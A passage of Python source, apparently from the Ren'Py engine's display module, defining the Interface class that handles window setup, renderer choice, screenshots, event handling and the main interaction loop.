@ivar interact_time: The time of the start of the first frame of the current interact_core.
@ivar time_event: A singleton ignored event.
@ivar event_time: The time of the current event.
@ivar timeout_time: The time at which the timeout will occur.
"""
def __init__(self):
# PNG data and the surface for the current file screenshot.
self.screenshot = None
self.screenshot_surface = None
self.old_scene = { }
self.transition = { }
self.ongoing_transition = { }
self.transition_time = { }
self.transition_from = { }
self.suppress_transition = False
self.quick_quit = False
self.force_redraw = False
self.restart_interaction = False
self.pushed_event = None
self.ticks = 0
self.mouse = 'default'
self.timeout_time = None
self.last_event = None
self.current_context = None
self.roll_forward = None
# Things to be preloaded.
self.preloads = [ ]
# The time at which this draw occurs.
self.frame_time = 0
# The time when this interaction occured.
self.interact_time = None
# The time we last tried to quit.
self.quit_time = 0
# Are we currently processing the quit event?
self.in_quit_event = False
self.time_event = pygame.event.Event(TIMEEVENT)
self.redraw_event = pygame.event.Event(REDRAW)
# Are we focused?
self.mouse_focused = True
self.keyboard_focused = True
# Properties for each layer.
self.layer_properties = { }
# Have we shown the window this interaction?
self.shown_window = False
# Are we in fullscren mode?
self.fullscreen = False
# Should we ignore the rest of the current touch? Used to ignore the
# rest of a mousepress after a longpress occurs.
self.ignore_touch = False
# Should we clear the screenshot at the start of the next interaction?
self.clear_screenshot = False
for layer in renpy.config.layers + renpy.config.top_layers:
if layer in renpy.config.layer_clipping:
x, y, w, h = renpy.config.layer_clipping[layer]
self.layer_properties[layer] = dict(
xpos=x,
xanchor=0,
ypos=y,
yanchor=0,
xmaximum=w,
ymaximum=h,
xminimum=w,
yminimum=h,
clipping=True,
)
else:
self.layer_properties[layer] = dict()
# A stack giving the values of self.transition and self.transition_time
# for contexts outside the current one. This is used to restore those
# in the case where nothing has changed in the new context.
self.transition_info_stack = [ ]
# The time when the event was dispatched.
self.event_time = 0
# The time we saw the last mouse event.
self.mouse_event_time = None
# Should we show the mouse?
self.show_mouse = True
# Should we reset the display?
self.display_reset = False
# The last size we were resized to.
self.last_resize = None
# The thread that can do display operations.
self.thread = threading.current_thread()
# Initialize audio.
renpy.audio.audio.init()
# Initialize pygame.
try:
pygame.display.init()
except:
pass
# Init timing.
init_time()
self.mouse_event_time = get_time()
# The current window caption.
self.window_caption = None
renpy.game.interface = self
renpy.display.interface = self
# Are we in safe mode, from holding down shift at start?
self.safe_mode = False
# Do we need a background screenshot?
self.bgscreenshot_needed = False
# Event used to signal background screenshot taken.
self.bgscreenshot_event = threading.Event()
# The background screenshot surface.
self.bgscreenshot_surface = None
# Mouse move. If not None, information about the current mouse
# move.
self.mouse_move = None
# If in text editing mode, the current text editing event.
self.text_editing = None
# The text rectangle after the current draw.
self.text_rect = None
# The text rectangle after the previous draw.
self.old_text_rect = None
# Are we a touchscreen?
self.touch = renpy.exports.variant("touch")
# Should we restart the interaction?
self.restart_interaction = True
# For compatibility with older code.
if renpy.config.periodic_callback:
renpy.config.periodic_callbacks.append(renpy.config.periodic_callback)
renpy.display.emulator.init_emulator()
# Has start been called?
self.started = False
# Are we in fullscreen video mode?
self.fullscreen_video = False
self.safe_mode = get_safe_mode()
renpy.safe_mode_checked = True
# A scale factor used to compensate for the system DPI.
self.dpi_scale = self.setup_dpi_scaling()
renpy.display.log.write("DPI scale factor: %f", self.dpi_scale)
# A time until which we should draw at maximum framerate.
self.maximum_framerate_time = 0.0
self.maximum_framerate(initial_maximum_framerate)
# True if this is the first interact.
self.start_interact = True
# The time of each frame.
self.frame_times = [ ]
# The duration of each frame, in seconds.
self.frame_duration = 1.0 / 60.0
def setup_dpi_scaling(self):
if "RENPY_HIGHDPI" in os.environ:
return float(os.environ["RENPY_HIGHDPI"])
if not renpy.windows:
return 1.0
try:
import ctypes
from ctypes import c_void_p, c_int
ctypes.windll.user32.SetProcessDPIAware()
GetDC = ctypes.windll.user32.GetDC
GetDC.restype = c_void_p
GetDC.argtypes = [ c_void_p ]
ReleaseDC = ctypes.windll.user32.ReleaseDC
ReleaseDC.argtypes = [ c_void_p, c_void_p ]
GetDeviceCaps = ctypes.windll.gdi32.GetDeviceCaps
GetDeviceCaps.restype = c_int
GetDeviceCaps.argtypes = [ c_void_p, c_int ]
LOGPIXELSX = 88
dc = GetDC(None)
rv = GetDeviceCaps(dc, LOGPIXELSX) / 96.0
ReleaseDC(None, dc)
if rv < renpy.config.de_minimus_dpi_scale:
renpy.display.log.write("De minimus DPI scale, was %r", rv)
rv = 1.0
return rv
except:
renpy.display.log.write("Could not determine DPI scale factor:")
renpy.display.log.exception()
return 1.0
def start(self):
"""
Starts the interface, by opening a window and setting the mode.
"""
if self.started:
return
gc.collect()
if gc.garbage:
gc.garbage[:] = [ ]
renpy.display.render.render_ready()
# Kill off the presplash.
renpy.display.presplash.end()
renpy.main.log_clock("Interface start")
self.started = True
self.set_mode()
# Load the image fonts.
renpy.text.font.load_fonts()
# Setup periodic event.
pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)
# Don't grab the screen.
pygame.event.set_grab(False)
if not self.safe_mode:
renpy.display.controller.init()
s = "Total time until interface ready: {}s".format(time.time() - import_time)
renpy.display.log.write(s)
if renpy.android and not renpy.config.log_to_stdout:
print(s)
def post_init(self):
"""
This is called after display init, but before the window is created.
"""
pygame.display.hint("SDL_VIDEO_MINIMIZE_ON_FOCUS_LOSS", "0")
# Needed for Unity.
wmclass = renpy.config.save_directory or os.path.basename(sys.argv[0])
os.environ[b'SDL_VIDEO_X11_WMCLASS'] = wmclass.encode("utf-8")
self.set_window_caption(force=True)
self.set_icon()
if renpy.config.key_repeat is not None:
delay, repeat_delay = renpy.config.key_repeat
pygame.key.set_repeat(int(1000 * delay), int(1000 * repeat_delay))
if android:
android.wakelock(True)
# Block events we don't use.
for i in pygame.event.get_standard_events():
if i in enabled_events:
continue
if i in renpy.config.pygame_events:
continue
pygame.event.set_blocked(i)
def set_icon(self):
"""
This is called to set up the window icon.
"""
# Window icon.
icon = renpy.config.window_icon
if icon:
im = renpy.display.scale.image_load_unscaled(
renpy.loader.load(icon),
icon,
)
# Convert the aspect ratio to be square.
iw, ih = im.get_size()
imax = max(iw, ih)
square_im = renpy.display.pgrender.surface_unscaled((imax, imax), True)
square_im.blit(im, ( (imax-iw)/2, (imax-ih)/2 ))
im = square_im
pygame.display.set_icon(im)
def set_window_caption(self, force=False):
window_title = renpy.config.window_title
if window_title is None:
window_title = "A Ren'Py Game"
caption = renpy.translation.translate_string(window_title) + renpy.store._window_subtitle
if renpy.exports.get_autoreload():
caption += " - autoreload"
if not force and caption == self.window_caption:
return
self.window_caption = caption
pygame.display.set_caption(caption.encode("utf-8"))
def iconify(self):
pygame.display.iconify()
def get_draw_constructors(self):
"""
Figures out the list of draw constructors to try.
"""
renderer = renpy.game.preferences.renderer
renderer = os.environ.get("RENPY_RENDERER", renderer)
if self.safe_mode:
renderer = "sw"
if (renderer == "angle") and (not renpy.windows):
renderer = "auto"
renpy.config.renderer = renderer
if renderer == "auto":
if renpy.windows:
renderers = [ "gl", "angle", "sw" ]
else:
renderers = [ "gl", "sw" ]
if renpy.config.gl2:
renderers = [ "gl2", "egl2" ] + renderers
else:
renderers = [ renderer, "sw" ]
draw_objects = { }
def make_draw(name, mod, cls, *args):
if name not in renderers:
return False
try:
__import__(mod)
module = sys.modules[mod]
draw_class = getattr(module, cls)
draw_objects[name] = draw_class(*args)
return True
except:
renpy.display.log.write("Couldn't import {0} renderer:".format(name))
renpy.display.log.exception()
return False
if renpy.windows:
has_angle = make_draw("angle", "renpy.angle.gldraw", "GLDraw")
else:
has_angle = False
make_draw("gl", "renpy.gl.gldraw", "GLDraw", not has_angle)
make_draw("gl2", "renpy.gl2.gl2draw", "GL2Draw", "gl2", False)
make_draw("gles2", "renpy.gl2.gl2draw", "GL2Draw", "gles2", True)
make_draw("sw", "renpy.display.swdraw", "SWDraw")
rv = [ ]
def append_draw(name):
if name in draw_objects:
rv.append(draw_objects[name])
else:
renpy.display.log.write("Unknown renderer: {0}".format(name))
for i in renderers:
append_draw(i)
return rv
def kill_textures(self):
if renpy.display.draw is not None:
renpy.display.draw.kill_textures()
renpy.display.render.free_memory()
renpy.text.text.layout_cache_clear()
def kill_textures_and_surfaces(self):
"""
Kill all textures and surfaces that are loaded.
"""
self.kill_textures()
renpy.display.im.cache.clear()
renpy.display.module.bo_cache = None
def set_mode(self, physical_size=None):
"""
This sets the video mode. It also picks the draw object.
"""
# Ensure that we kill off the movie when changing screen res.
if renpy.display.draw and renpy.display.draw.info["renderer"] == "sw":
renpy.display.video.movie_stop(clear=False)
renpy.display.render.free_memory()
renpy.text.text.layout_cache_clear()
renpy.display.module.bo_cache = None
if self.display_reset:
pygame.key.stop_text_input() # @UndefinedVariable
pygame.key.set_text_input_rect(None) # @UndefinedVariable
self.text_rect = None
if renpy.display.draw.info["renderer"] == "angle":
renpy.display.draw.quit()
# This is necessary to fix a bug with restoring a window from
# minimized state on windows.
pygame.display.quit()
self.kill_textures_and_surfaces()
self.old_text_rect = None
self.display_reset = False
virtual_size = (renpy.config.screen_width, renpy.config.screen_height)
if physical_size is None:
if renpy.mobile or renpy.game.preferences.physical_size is None: # @UndefinedVariable
physical_size = (None, None)
else:
physical_size = renpy.game.preferences.physical_size
# Setup screen.
fullscreen = renpy.game.preferences.fullscreen
old_fullscreen = self.fullscreen
self.fullscreen = fullscreen
if os.environ.get('RENPY_DISABLE_FULLSCREEN', False):
fullscreen = False
self.fullscreen = renpy.game.preferences.fullscreen
if renpy.display.draw:
draws = [ renpy.display.draw ]
else:
draws = self.get_draw_constructors()
for draw in draws:
if draw.set_mode(virtual_size, physical_size, fullscreen):
renpy.display.draw = draw
renpy.display.render.models = draw.info.get("models", False)
break
else:
# pygame.display.quit()
pass
else:
# Ensure we don't get stuck in fullscreen.
renpy.game.preferences.fullscreen = False
raise Exception("Could not set video mode.")
# Save the video size.
if renpy.config.save_physical_size and not fullscreen and not old_fullscreen:
renpy.game.preferences.physical_size = renpy.display.draw.get_physical_size()
if android:
android.init()
# We need to redraw the (now blank) screen.
self.force_redraw = True
# Assume we have focus until told otherwise.
self.mouse_focused = True
self.keyboard_focused = True
# Assume we're not minimized.
self.minimized = False
# Force an interaction restart.
self.restart_interaction = True
# True if we're doing a one-time profile.
self.profile_once = False
# Clear the frame times.
self.frame_times = [ ]
def draw_screen(self, root_widget, fullscreen_video, draw):
try:
renpy.display.render.per_frame = True
renpy.display.screen.per_frame()
finally:
renpy.display.render.per_frame = False
surftree = renpy.display.render.render_screen(
root_widget,
renpy.config.screen_width,
renpy.config.screen_height,
)
if draw:
renpy.display.draw.draw_screen(surftree, fullscreen_video)
now = time.time()
self.frame_times.append(now)
while (now - self.frame_times[0]) > renpy.config.performance_window:
self.frame_times.pop(0)
renpy.display.render.mark_sweep()
renpy.display.focus.take_focuses()
self.surftree = surftree
self.fullscreen_video = fullscreen_video
def take_screenshot(self, scale, background=False):
"""
This takes a screenshot of the current screen, and stores it so
that it can gotten using get_screenshot()
`background`
If true, we're in a background thread. So queue the request
until it can be handled by the main thread.
"""
self.clear_screenshot = False
# Do nothing before the first interaction.
if not self.started:
return
if background and not renpy.emscripten:
self.bgscreenshot_event.clear()
self.bgscreenshot_needed = True
if not self.bgscreenshot_event.wait(1.0):
raise Exception("Screenshot timed out.")
surf = self.bgscreenshot_surface
self.bgscreenshot_surface = None
else:
surf = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
surf = renpy.display.scale.smoothscale(surf, scale)
renpy.display.render.mutated_surface(surf)
self.screenshot_surface = surf
sio = cStringIO.StringIO()
renpy.display.module.save_png(surf, sio, 0)
self.screenshot = sio.getvalue()
sio.close()
def check_background_screenshot(self):
"""
Handles requests for a background screenshot.
"""
if self.bgscreenshot_needed:
self.bgscreenshot_needed = False
self.bgscreenshot_surface = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
self.bgscreenshot_event.set()
def get_screenshot(self):
"""
Gets the current screenshot, as a string. Returns None if there isn't
a current screenshot.
"""
if not self.started:
self.start()
rv = self.screenshot
if not rv:
self.take_screenshot(
(renpy.config.thumbnail_width, renpy.config.thumbnail_height),
background=(threading.current_thread() is not self.thread),
)
rv = self.screenshot
self.lose_screenshot()
return rv
def lose_screenshot(self):
"""
This deallocates the saved screenshot.
"""
self.screenshot = None
self.screenshot_surface = None
def save_screenshot(self, filename):
"""
Saves a full-size screenshot in the given filename.
"""
window = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
if renpy.config.screenshot_crop:
window = window.subsurface(renpy.config.screenshot_crop)
try:
renpy.display.scale.image_save_unscaled(window, filename)
if renpy.emscripten:
import emscripten
emscripten.run_script(r'''FSDownload('%s')''' % filename)
return True
except:
if renpy.config.debug:
raise
return False
def show_window(self):
if not renpy.store._window:
return
if not renpy.game.preferences.show_empty_window:
return
if renpy.game.context().scene_lists.shown_window:
return
if renpy.config.empty_window:
old_history = renpy.store._history # @UndefinedVariable
renpy.store._history = False
PPP("empty window")
try:
renpy.config.empty_window()
finally:
renpy.store._history = old_history
def do_with(self, trans, paired, clear=False):
if renpy.config.with_callback:
trans = renpy.config.with_callback(trans, paired)
if (not trans) or self.suppress_transition:
self.with_none()
return False
else:
self.set_transition(trans)
return self.interact(trans_pause=True,
suppress_overlay=not renpy.config.overlay_during_with,
mouse='with',
clear=clear)
def with_none(self, overlay=True):
"""
Implements the with None command, which sets the scene we will
be transitioning from.
"""
PPP("start of with none")
renpy.game.context().say_attributes = None
# Show the window, if that's necessary.
self.show_window()
# Compute the overlay.
if overlay:
self.compute_overlay()
scene_lists = renpy.game.context().scene_lists
# Compute the scene.
for layer, d in self.compute_scene(scene_lists).iteritems():
if layer not in self.transition:
self.old_scene[layer] = d
# Get rid of transient things.
for i in renpy.config.overlay_layers:
scene_lists.clear(i)
scene_lists.replace_transient()
scene_lists.shown_window = False
if renpy.store._side_image_attributes_reset:
renpy.store._side_image_attributes = None
renpy.store._side_image_attributes_reset = False
def set_transition(self, transition, layer=None, force=False):
"""
Sets the transition that will be performed as part of the next
interaction.
"""
if self.suppress_transition and not force:
return
if transition is None:
self.transition.pop(layer, None)
else:
self.transition[layer] = transition
def event_peek(self):
"""
This peeks the next event. It returns None if no event exists.
"""
if self.pushed_event:
return self.pushed_event
ev = pygame.event.poll()
if ev.type == pygame.NOEVENT:
self.check_background_screenshot()
# Seems to prevent the CPU from speeding up.
renpy.display.draw.event_peek_sleep()
return None
self.pushed_event = ev
return ev
def event_poll(self):
"""
Called to busy-wait for an event while we're waiting to
redraw a frame.
"""
if self.pushed_event:
rv = self.pushed_event
self.pushed_event = None
else:
rv = pygame.event.poll()
self.last_event = rv
return rv
def event_wait(self):
"""
This is in its own function so that we can track in the
profiler how much time is spent in interact.
"""
if self.pushed_event:
rv = self.pushed_event
self.pushed_event = None
self.last_event = rv
return rv
self.check_background_screenshot()
ev = pygame.event.wait()
self.last_event = ev
return ev
def compute_overlay(self):
if renpy.store.suppress_overlay:
return
# Figure out what the overlay layer should look like.
renpy.ui.layer("overlay")
for i in renpy.config.overlay_functions:
i()
if renpy.game.context().scene_lists.shown_window:
for i in renpy.config.window_overlay_functions:
i()
renpy.ui.close()
def compute_scene(self, scene_lists):
"""
This converts scene lists into a dictionary mapping layer
name to a Fixed containing that layer.
"""
rv = { }
for layer in renpy.config.layers + renpy.config.top_layers:
rv[layer] = scene_lists.make_layer(layer, self.layer_properties[layer])
root = renpy.display.layout.MultiBox(layout='fixed')
root.layers = { }
for layer in renpy.config.layers:
root.layers[layer] = rv[layer]
root.add(rv[layer])
rv[None] = root
return rv
def quit_event(self):
"""
This is called to handle the user invoking a quit.
"""
if self.screenshot is None:
renpy.exports.take_screenshot()
if self.quit_time > (time.time() - .75):
renpy.exports.quit(save=True)
if self.in_quit_event:
renpy.exports.quit(save=True)
if renpy.config.quit_action is not None:
self.quit_time = time.time()
# Make the screen more suitable for interactions.
renpy.exports.movie_stop(only_fullscreen=True)
renpy.store.mouse_visible = True
try:
self.in_quit_event = True
renpy.display.behavior.run(renpy.config.quit_action)
finally:
self.in_quit_event = False
else:
renpy.exports.quit(save=True)
def get_mouse_info(self):
# Figure out if the mouse visibility algorithm is hiding the mouse.
if (renpy.config.mouse_hide_time is not None) and (self.mouse_event_time + renpy.config.mouse_hide_time < renpy.display.core.get_time()):
visible = False
else:
visible = renpy.store.mouse_visible and (not renpy.game.less_mouse)
visible = visible and self.show_mouse and not (renpy.display.video.fullscreen)
# If not visible, hide the mouse.
if not visible:
return False, 0, 0, None
# Deal with a hardware mouse, the easy way.
if not renpy.config.mouse:
return True, 0, 0, None
# Deal with the mouse going offscreen.
if not self.mouse_focused:
return False, 0, 0, None
mouse_kind = renpy.display.focus.get_mouse() or self.mouse
# Figure out the mouse animation.
if mouse_kind in renpy.config.mouse:
anim = renpy.config.mouse[mouse_kind]
else:
anim = renpy.config.mouse[getattr(renpy.store, 'default_mouse', 'default')]
img, x, y = anim[self.ticks % len(anim)]
rend = renpy.display.im.load_image(img)
tex = rend.children[0][0]
xo = rend.children[0][1]
yo = rend.children[0][2]
return False, x - xo, y - yo, tex
def set_mouse_pos(self, x, y, duration):
"""
Sets the mouse position. Duration can be a number of seconds or
None.
"""
self.mouse_move = MouseMove(x, y, duration)
self.force_redraw = True
def drawn_since(self, seconds_ago):
"""
Returns true if the screen has been drawn in the last `seconds_ago`,
and false otherwise.
"""
return (get_time() - self.frame_time) <= seconds_ago
def check_suspend(self, ev):
"""
Handles the SDL2 suspend process.
"""
def save():
if renpy.config.save_on_mobile_background and (not renpy.store.main_menu):
renpy.loadsave.save("_reload-1")
renpy.persistent.update(True)
if ev.type == pygame.APP_TERMINATING:
save()
sys.exit(0)
if ev.type != pygame.APP_WILLENTERBACKGROUND:
return False
# At this point, we're about to enter the background.
renpy.audio.audio.pause_all()
if android:
android.wakelock(False)
pygame.time.set_timer(PERIODIC, 0)
pygame.time.set_timer(REDRAW, 0)
pygame.time.set_timer(TIMEEVENT, 0)
save()
if renpy.config.quit_on_mobile_background:
sys.exit(0)
renpy.exports.free_memory()
print("Entered background.")
while True:
ev = pygame.event.wait()
if ev.type == pygame.APP_DIDENTERFOREGROUND:
break
if ev.type == pygame.APP_TERMINATING:
sys.exit(0)
print("Entering foreground.")
# Since we came back to life, we can get rid of the
# auto-reload.
renpy.loadsave.unlink_save("_reload-1")
pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)
renpy.audio.audio.unpause_all()
if android:
android.wakelock(True)
# Reset the display so we get the GL context back.
self.display_reset = True
self.restart_interaction = True
return True
def iconified(self):
"""
Called when we become an icon.
"""
if self.minimized:
return
self.minimized = True
renpy.display.log.write("The window was minimized.")
def restored(self):
"""
Called when we are restored from being an icon.
"""
# This is necessary on Windows/DirectX/Angle, as otherwise we get
# a blank screen.
if not self.minimized:
return
self.minimized = False
renpy.display.log.write("The window was restored.")
if renpy.windows:
self.display_reset = True
self.set_mode(self.last_resize)
def enter_context(self):
"""
Called when we enter a new context.
"""
# Stop ongoing transitions.
self.ongoing_transition.clear()
self.transition_from.clear()
self.transition_time.clear()
def post_time_event(self):
"""
Posts a time_event object to the queue.
"""
try:
pygame.event.post(self.time_event)
except:
pass
def after_longpress(self):
"""
Called after a longpress, to ignore the mouse button release.
"""
self.ignore_touch = True
renpy.display.focus.mouse_handler(None, -1, -1, default=False)
def text_event_in_queue(self):
"""
Returns true if the next event in the queue is a text editing event.
"""
ev = self.event_peek()
if ev is None:
return False
else:
return ev.type in (pygame.TEXTINPUT, pygame.TEXTEDITING)
def update_text_rect(self):
"""
Updates the text input state and text rectangle.
"""
if renpy.store._text_rect is not None: # @UndefinedVariable
self.text_rect = renpy.store._text_rect # @UndefinedVariable
if self.text_rect is not None:
not_shown = pygame.key.has_screen_keyboard_support() and not pygame.key.is_screen_keyboard_shown() # @UndefinedVariable
if self.old_text_rect != self.text_rect:
x, y, w, h = self.text_rect
x0, y0 = renpy.display.draw.untranslate_point(x, y)
x1, y1 = renpy.display.draw.untranslate_point(x + w, y + h)
rect = (x0, y0, x1 - x0, y1 - y0)
pygame.key.set_text_input_rect(rect) # @UndefinedVariable
if not self.old_text_rect or not_shown:
pygame.key.start_text_input() # @UndefinedVariable
else:
if self.old_text_rect:
pygame.key.stop_text_input() # @UndefinedVariable
pygame.key.set_text_input_rect(None) # @UndefinedVariable
self.old_text_rect = self.text_rect
def maximum_framerate(self, t):
"""
Forces Ren'Py to draw the screen at the maximum framerate for `t` seconds.
"""
if t is None:
self.maximum_framerate_time = 0
else:
self.maximum_framerate_time = max(self.maximum_framerate_time, get_time() + t)
def interact(self, clear=True, suppress_window=False, trans_pause=False, **kwargs):
"""
This handles an interaction, restarting it if necessary. All of the
keyword arguments are passed off to interact_core.
"""
renpy.plog(1, "start of new interaction")
if not self.started:
self.start()
if self.clear_screenshot:
self.lose_screenshot()
self.clear_screenshot = False
self.trans_pause = trans_pause
# Cancel magic error reporting.
renpy.bootstrap.report_error = None
context = renpy.game.context()
if context.interacting:
raise Exception("Cannot start an interaction in the middle of an interaction, without creating a new context.")
context.interacting = True
# Show a missing window.
if not suppress_window:
self.show_window()
# These things can be done once per interaction.
preloads = self.preloads
self.preloads = [ ]
try:
for i in renpy.config.start_interact_callbacks:
i()
repeat = True
self.start_interact = True
while repeat:
repeat, rv = self.interact_core(preloads=preloads, trans_pause=trans_pause, **kwargs)
self.start_interact = False
return rv
finally:
context.interacting = False
# Clean out transient stuff at the end of an interaction.
if clear:
scene_lists = renpy.game.context().scene_lists
scene_lists.replace_transient()
self.ongoing_transition = { }
self.transition_time = { }
self.transition_from = { }
self.restart_interaction = True
renpy.game.context().mark_seen()
renpy.game.context().scene_lists.shown_window = False
if renpy.game.log is not None:
renpy.game.log.did_interaction = True
if renpy.store._side_image_attributes_reset:
renpy.store._side_image_attributes = None
renpy.store._side_image_attributes_reset = False
def consider_gc(self):
"""
Considers if we should peform a garbage collection.
"""
if not renpy.config.manage_gc:
return
count = gc.get_count()
if count[0] >= renpy.config.idle_gc_count:
renpy.plog(2, "before gc")
if count[2] >= renpy.config.gc_thresholds[2]:
gen = 2
elif count[1] >= renpy.config.gc_thresholds[1]:
gen = 1
else:
gen = 0
gc.collect(gen)
if gc.garbage:
renpy.memory.print_garbage(gen)
gc.garbage[:] = [ ]
renpy.plog(2, "after gc")
def idle_frame(self, can_block, expensive):
"""
Tasks that are run during "idle" frames.
"""
if expensive:
renpy.plog(1, "start idle_frame (expensive)")
else:
renpy.plog(1, "start idle_frame (inexpensive)")
# We want this to include the GC time, so we don't predict on
# frames where we GC.
start = get_time()
step = 1
while True:
if self.event_peek():
break
if not (can_block and expensive):
if get_time() > (start + .0005):
break
# Step 1: Run gc.
if step == 1:
self.consider_gc()
step += 1
# Step 2: Push textures to GPU.
elif step == 2:
renpy.display.draw.ready_one_texture()
step += 1
# Step 3: Predict more images.
elif step == 3:
if not self.prediction_coroutine:
step += 1
continue
try:
result = self.prediction_coroutine.send(expensive)
except ValueError:
# Saw this happen once during a quit, giving a
# ValueError: generator already executing
result = None
if result is None:
self.prediction_coroutine = None
step += 1
elif result is False:
if not expensive:
step += 1
# Step 4: Preload images (on emscripten)
elif step == 4:
if expensive and renpy.emscripten:
renpy.display.im.cache.preload_thread_pass()
step += 1
# Step 5: Autosave.
elif step == 5:
if not self.did_autosave:
renpy.loadsave.autosave()
renpy.persistent.check_update()
self.did_autosave = True
step += 1
else:
break
if expensive:
renpy.plog(1, "end idle_frame (expensive)")
else:
renpy.plog(1, "end idle_frame (inexpensive)")
def interact_core(self,
show_mouse=True,
trans_pause=False,
suppress_overlay=False,
suppress_underlay=False,
mouse='default',
preloads=[],
roll_forward=None,
):
"""
This handles one cycle of displaying an image to the user,
and then responding to user input.
@param show_mouse: Should the mouse be shown during this
interaction? Only advisory, and usually doesn't work.
@param trans_pause: If given, we must have a transition. Should we
add a pause behavior during the transition?
@param suppress_overlay: This suppresses the display of the overlay.
@param suppress_underlay: This suppresses the display of the underlay.
"""
renpy.plog(1, "start interact_core")
suppress_overlay = suppress_overlay or renpy.store.suppress_overlay
# Store the various parameters.
self.suppress_overlay = suppress_overlay
self.suppress_underlay = suppress_underlay
self.trans_pause = trans_pause
# Show default screens.
renpy.display.screen.show_overlay_screens(suppress_overlay)
# Prepare screens, if need be.
renpy.display.screen.prepare_screens()
self.roll_forward = roll_forward
self.show_mouse = show_mouse
suppress_transition = renpy.config.skipping or renpy.game.less_updates
# The global one.
self.suppress_transition = False
# Figure out transitions.
if suppress_transition:
self.ongoing_transition.clear()
self.transition_from.clear()
self.transition_time.clear()
else:
for k in self.transition:
if k not in self.old_scene:
continue
self.ongoing_transition[k] = self.transition[k]
self.transition_from[k] = self.old_scene[k]._in_current_store()
self.transition_time[k] = None
self.transition.clear()
# Safety condition, prevents deadlocks.
if trans_pause:
if not self.ongoing_transition:
return False, None
if None not in self.ongoing_transition:
return False, None
if suppress_transition:
return False, None
if not self.old_scene:
return False, None
# Check to see if the language has changed.
renpy.translation.check_language()
# We just restarted.
self.restart_interaction = False
# Setup the mouse.
self.mouse = mouse
# The start and end times of this interaction.
start_time = get_time()
end_time = start_time
# frames = 0
for i in renpy.config.interact_callbacks:
i()
# Set the window caption.
self.set_window_caption()
# Tick time forward.
renpy.display.im.cache.tick()
renpy.text.text.text_tick()
renpy.display.predict.reset()
# Clear the size groups.
renpy.display.layout.size_groups.clear()
# Clear the set of updated screens.
renpy.display.screen.updated_screens.clear()
# Clear some events.
pygame.event.clear((pygame.MOUSEMOTION,
PERIODIC,
TIMEEVENT,
REDRAW))
# Add a single TIMEEVENT to the queue.
self.post_time_event()
# Figure out the scene list we want to show.
scene_lists = renpy.game.context().scene_lists
# Remove the now-hidden things.
scene_lists.remove_hidden()
# Compute the overlay.
if not suppress_overlay:
self.compute_overlay()
# The root widget of everything that is displayed on the screen.
root_widget = renpy.display.layout.MultiBox(layout='fixed')
root_widget.layers = { }
# A list of widgets that are roots of trees of widgets that are
# considered for focusing.
focus_roots = [ ]
# Add the underlay to the root widget.
if not suppress_underlay:
for i in renpy.config.underlay:
root_widget.add(i)
focus_roots.append(i)
if roll_forward is not None:
rfw = renpy.display.behavior.RollForward(roll_forward)
root_widget.add(rfw)
focus_roots.append(rfw)
# Figure out the scene. (All of the layers, and the root.)
scene = self.compute_scene(scene_lists)
renpy.display.tts.set_root(scene[None])
renpy.plog(1, "computed scene")
# If necessary, load all images here.
for w in scene.itervalues():
try:
renpy.display.predict.displayable(w)
except:
pass
renpy.plog(1, "final predict")
# The root widget of all of the layers.
layers_root = renpy.display.layout.MultiBox(layout='fixed')
layers_root.layers = { }
def add_layer(where, layer):
scene_layer = scene[layer]
focus_roots.append(scene_layer)
if (self.ongoing_transition.get(layer, None) and
not suppress_transition):
trans = self.ongoing_transition[layer](
old_widget=self.transition_from[layer],
new_widget=scene_layer)
if not isinstance(trans, Displayable):
raise Exception("Expected transition to be a displayable, not a %r" % trans)
transition_time = self.transition_time.get(layer, None)
where.add(trans, transition_time, transition_time)
where.layers[layer] = trans
else:
where.layers[layer] = scene_layer
where.add(scene_layer)
# Add layers (perhaps with transitions) to the layers root.
for layer in renpy.config.layers:
add_layer(layers_root, layer)
# Add layers_root to root_widget, perhaps through a transition.
if (self.ongoing_transition.get(None, None) and
not suppress_transition):
old_root = renpy.display.layout.MultiBox(layout='fixed')
old_root.layers = { }
for layer in renpy.config.layers:
d = self.transition_from[None].layers[layer]
old_root.layers[layer] = d
old_root.add(d)
trans = self.ongoing_transition[None](
old_widget=old_root,
new_widget=layers_root)
if not isinstance(trans, Displayable):
raise Exception("Expected transition to be a displayable, not a %r" % trans)
trans._show()
transition_time = self.transition_time.get(None, None)
root_widget.add(trans, transition_time, transition_time)
if trans_pause:
if renpy.store._dismiss_pause:
sb = renpy.display.behavior.SayBehavior()
else:
sb = renpy.display.behavior.SayBehavior(dismiss='dismiss_hard_pause')
root_widget.add(sb)
focus_roots.append(sb)
pb = renpy.display.behavior.PauseBehavior(trans.delay)
root_widget.add(pb, transition_time, transition_time)
focus_roots.append(pb)
else:
root_widget.add(layers_root)
# Add top_layers to the root_widget.
for layer in renpy.config.top_layers:
add_layer(root_widget, layer)
for i in renpy.display.emulator.overlay:
root_widget.add(i)
del add_layer
self.prediction_coroutine = renpy.display.predict.prediction_coroutine(root_widget)
self.prediction_coroutine.send(None)
# Clean out the registered adjustments.
renpy.display.behavior.adj_registered.clear()
# Clean up some movie-related things.
renpy.display.video.early_interact()
# Call per-interaction code for all widgets.
renpy.display.behavior.input_pre_per_interact()
root_widget.visit_all(lambda i : i.per_interact())
renpy.display.behavior.input_post_per_interact()
# Now, update various things regarding scenes and transitions,
# so we are ready for a new interaction or a restart.
self.old_scene = scene
# Okay, from here on we now have a single root widget (root_widget),
# which we will try to show to the user.
# Figure out what should be focused.
renpy.display.focus.before_interact(focus_roots)
# Something updated the screens. Deal with it now, so the player doesn't
# see it.
if self.restart_interaction:
return True, None
# Redraw the screen.
needs_redraw = True
# First pass through the while loop?
first_pass = True
# We don't yet know when the interaction began.
self.interact_time = None
# We only want to do autosave once.
self.did_autosave = False
old_timeout_time = None
old_redraw_time = None
rv = None
# Start sound.
renpy.audio.audio.interact()
# How long until we redraw.
_redraw_in = 3600
# Have we drawn a frame yet?
video_frame_drawn = False
# We're no longer after rollback.
renpy.game.after_rollback = False
# How many frames have we shown so far?
frame = 0
can_block = False
# This try block is used to force cleanup even on termination
# caused by an exception propagating through this function.
try:
while rv is None:
renpy.plog(1, "start of interact while loop")
renpy.execution.not_infinite_loop(10)
# Check for a change in fullscreen preference.
if ((self.fullscreen != renpy.game.preferences.fullscreen) or
self.display_reset or (renpy.display.draw is None)):
self.set_mode()
needs_redraw = True
# Check for autoreload.
if renpy.loader.needs_autoreload:
